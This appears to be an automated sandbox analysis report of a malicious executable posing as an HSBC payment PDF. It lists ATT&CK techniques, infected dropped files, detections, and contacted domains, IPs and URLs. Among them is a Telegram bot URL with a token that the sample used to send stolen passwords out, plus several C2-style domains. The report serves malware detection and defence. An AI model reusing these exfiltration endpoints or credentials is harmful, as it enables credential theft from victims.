Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 LSASS Driver	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	3 Obfuscated Files or Information	NTDS	127 System Information Discovery	Distributed Component Object Model	121 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	2 Valid Accounts	2 Software Packing	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Access Token Manipulation	1 Timestomp	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	212 Process Injection	1 DLL Side-Loading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	222 Masquerading	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Virtualization/Sandbox Evasion	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	212 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	100%	Avira	W32/Infector.Gen
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://crashpad.chromium.org/bug/new	0%	Avira URL Cloud	safe
http://54.244.188.177:80/vejjgkofjksncu6	0%	Avira URL Cloud	safe
http://18.141.10.107//	0%	Avira URL Cloud	safe
http://82.112.184.197/reorqerswtf	0%	Avira URL Cloud	safe
http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005	100%	Avira URL Cloud	malware
http://ww99.przvgke.biz/	100%	Avira URL Cloud	malware
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	0%	Avira URL Cloud	safe
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzVjNDkwMmIx	100%	Avira URL Cloud	malware
http://54.244.188.177/vejjgkofjksncu	0%	Avira URL Cloud	safe
http://82.112.184.197/w	0%	Avira URL Cloud	safe
https://api.telegram	0%	Avira URL Cloud	safe
http://ww99.przvgke.biz/aikqer	100%	Avira URL Cloud	malware
http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005~X	100%	Avira URL Cloud	malware
http://54.244.188.177/agwftt	0%	Avira URL Cloud	safe
http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005$G	100%	Avira URL Cloud	malware
http://ww7.przvgke.biz/aikqer?usid=23&utid=8062768193	100%	Avira URL Cloud	malware
http://ww7.przvgke.biz/	100%	Avira URL Cloud	malware
http://82.112.184.197/(	0%	Avira URL Cloud	safe
http://54.244.188.177/vejjgkofjksncuSZ99	0%	Avira URL Cloud	safe
https://crashpad.chromium.org/	0%	Avira URL Cloud	safe
http://18.141.10.107/nfmiz	0%	Avira URL Cloud	safe
http://82.112.184.197/reorqerswtft	0%	Avira URL Cloud	safe
http://ww99.przvgke.biz/TY	100%	Avira URL Cloud	malware
http://ww99.przvgke.biz/gtsohqagtapqeyt	100%	Avira URL Cloud	malware
http://18.141.10.107/ljydopjkwkbil	0%	Avira URL Cloud	safe
http://18.141.10.107/b	0%	Avira URL Cloud	safe
http://18.141.10.107/xUw	0%	Avira URL Cloud	safe
http://18.141.10.107/nfm	0%	Avira URL Cloud	safe
http://82.112.184.197/lvpmgtiw	0%	Avira URL Cloud	safe
http://18.141.10.107:80/ljydopjkwkbil	0%	Avira URL Cloud	safe
http://18.141.10.107/lfrkuluoy	0%	Avira URL Cloud	safe
http://ww12.przvgke.biz/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
przvgke.biz	172.234.222.138	true	false	high
76899.bodis.com	199.59.243.227	true	false	high
ssbzmoy.biz	18.141.10.107	true	false	high
knjghuig.biz	18.141.10.107	true	false	high
vjaxhpbji.biz	82.112.184.197	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
reallyfreegeoip.org	104.21.67.152	true	false	high
ifsaia.biz	13.251.16.150	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
cvgrf.biz	54.244.188.177	true	false	high
ww99.przvgke.biz	72.52.179.174	true	false	high
lpuegx.biz	82.112.184.197	true	false	high
saytjshyf.biz	44.221.84.105	true	false	high
084725.parkingcrew.net	76.223.26.96	true	false	high
xlfhhhm.biz	47.129.31.212	true	false	high
npukfztj.biz	44.221.84.105	true	false	high
api.telegram.org	149.154.167.220	true	false	high
ww7.przvgke.biz	unknown	unknown	true	unknown
zlenh.biz	unknown	unknown	false	high
checkip.dyndns.org	unknown	unknown	false	high
uhxqin.biz	unknown	unknown	false	high
ww12.przvgke.biz	unknown	unknown	true	unknown
anpmnmxo.biz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://knjghuig.biz/nfm	false	high
http://przvgke.biz/aikqer	false	high
http://vjaxhpbji.biz/wjff	false	high
http://checkip.dyndns.org/	false	high
http://ssbzmoy.biz/ljydopjkwkbil	false	high
http://xlfhhhm.biz/cuqeksdmcesun	false	high
http://vjaxhpbji.biz/glgnfdl	false	high
http://pywolwnvd.biz/agwftt	false	high
http://lpuegx.biz/reorqerswtf	false	high
http://cvgrf.biz/ubwy	false	high
http://ssbzmoy.biz/lfrkuluoy	false	high
https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189	false	high
http://pywolwnvd.biz/vejjgkofjksncu	false	high
http://lpuegx.biz/lvpmgtiw	false	high
http://przvgke.biz/gtsohqagtapqeyt	false	high
http://npukfztj.biz/edmrjb	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ww99.przvgke.biz/	armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.telegram.org	RegSvcs.exe, 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	RegSvcs.exe, 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://crashpad.chromium.org/bug/new	setup.exe1.3.dr	false	Avira URL Cloud: safe	unknown
http://knjghuig.biz/	armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005	armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613	RegSvcs.exe, 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177/vejjgkofjksncu	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1362494796.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1369962913.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385930631.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177:80/vejjgkofjksncu6	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://82.112.184.197/w	armsvc.exe, 00000003.00000003.1774140631.0000000000755000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://82.112.184.197/reorqerswtf	armsvc.exe, 00000003.00000003.1774989886.0000000000746000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new	setup.exe1.3.dr	false	Avira URL Cloud: safe	unknown
http://18.141.10.107/	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385930631.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1369962913.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzVjNDkwMmIx	armsvc.exe, 00000003.00000003.1480703617.0000000002280000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com	armsvc.exe, 00000003.00000003.1513462824.0000000000764000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1505305672.0000000002270000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1505013934.0000000002160000.00000004.00001000.00020000.00000000.sdmp	false		high
http://18.141.10.107//	armsvc.exe, 00000003.00000003.1536824828.0000000000755000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp	false		high
https://api.telegram	RegSvcs.exe, 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005~X	armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177/agwftt	armsvc.exe, 00000003.00000003.1363534735.0000000000764000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ww99.przvgke.biz/aikqer	armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1513750361.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005$G	armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 0000000C.00000002.2611502749.0000000002391000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ww7.przvgke.biz/	armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177/	armsvc.exe, 00000003.00000003.1363534735.000000000076D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1391756054.000000000076D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2611502749.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp	false		high
http://82.112.184.197/(	armsvc.exe, 00000003.00000003.1774140631.0000000000755000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crashpad.chromium.org/	setup.exe1.3.dr	false	Avira URL Cloud: safe	unknown
http://ww7.przvgke.biz/aikqer?usid=23&utid=8062768193	armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2003591136.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2004431496.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.google.com/chrome/?p=usage_stats_crash_reports	setup.exe1.3.dr	false		high
http://54.244.188.177/vejjgkofjksncuSZ99	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.189.0	RegSvcs.exe, 0000000C.00000002.2611502749.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://82.112.184.197/reorqerswtft	armsvc.exe, 00000003.00000003.1774989886.0000000000746000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	RegSvcs.exe, 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome?p=chrome_uninstall_surveymicrosoft-edge:open..	setup.exe1.3.dr	false		high
http://18.141.10.107/nfmiz	armsvc.exe, 00000003.00000003.1773374374.0000000000766000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774551180.000000000076C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536726794.0000000000766000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pcnatrk.net/track.	armsvc.exe, 00000003.00000003.1480703617.0000000002280000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ww99.przvgke.biz/TY	armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ww99.przvgke.biz/gtsohqagtapqeyt	armsvc.exe, 00000003.00000003.1774551180.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1513750361.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1774140631.000000000074D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1773374374.0000000000780000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536824828.000000000074D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://18.141.10.107/ljydopjkwkbil	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1369962913.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1369962913.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385930631.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pywolwnvd.biz/L	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000A48000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.141.10.107/b	armsvc.exe, 00000003.00000003.1536824828.0000000000755000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.141.10.107/xUw	armsvc.exe, 00000003.00000003.1536824828.0000000000755000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.141.10.107/nfm	armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://82.112.184.197/lvpmgtiw	armsvc.exe, 00000003.00000003.2004431496.000000000076D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	RegSvcs.exe, 0000000C.00000002.2611502749.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.winimage.com/zLibDll	armsvc.exe, 00000003.00000003.1709255215.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://18.141.10.107:80/ljydopjkwkbil	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1385419248.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.141.10.107/lfrkuluoy	armsvc.exe, 00000003.00000003.1391756054.0000000000766000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	RegSvcs.exe, 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ww12.przvgke.biz/	armsvc.exe, 00000003.00000003.1513462824.0000000000783000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1536368072.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.telegram.org/bot-/sendDocument?chat_id=	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp	false		high
